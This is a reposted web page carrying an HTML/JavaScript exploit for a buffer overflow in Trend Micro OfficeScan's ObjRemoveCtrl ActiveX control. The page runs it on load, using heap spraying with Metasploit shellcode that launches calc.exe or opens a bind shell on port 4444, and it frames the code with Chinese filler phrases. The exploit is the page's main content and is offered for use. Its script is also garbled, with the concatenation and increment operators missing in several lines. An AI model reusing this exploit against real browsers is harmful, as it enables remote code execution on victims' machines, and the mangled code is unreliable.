Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

互联网
人生太苦,多加点糖。所有运气都藏在善良里。如果事与愿违,就相信上帝另有安排。与其抱怨过去,不如认真面对未来。慢慢释怀,才能让自己变好。
<!--
Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6 IE7, OfficeScan 7.3 patch 4, OfficeScanRemoveCtrl.dll version 7.3.0.1020
The control is installed when you install OfficeScan through the server web console.
This was fixed in OfficeScan 8.x(uses strcpy_s which throws INVALID_PARAMETER, still crashes the browser though)
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit</title>
<script language="JavaScript" defer>
function Check() {


// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"
"%u314e%u7475%u7038%u7765%u4370"); // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"
"%u684f%u3956%u386f%u4350");
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var slackspace = headersize shellcode1.length;
while (bigblock.length < slackspace) bigblock = bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length slackspace < 0x40000) block = block block fillblock; var memory = new Array();
for (i = 0; i < 330; i ){ memory[i] = block shellcode1 } var buf = '';
while (buf.length < 1008) buf = buf unescape(" "); obj.Server = buf;
}
</script>


</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:5EFE8CB1-D095-11D1-88FC-0080C859833B" id="obj" size="0" width="0">
Unable to create object
</object> </body>
</html>

以上就是Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit 。牡丹花好,终须绿叶扶持。更多关于Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit 请关注haodaima.com其它相关文章!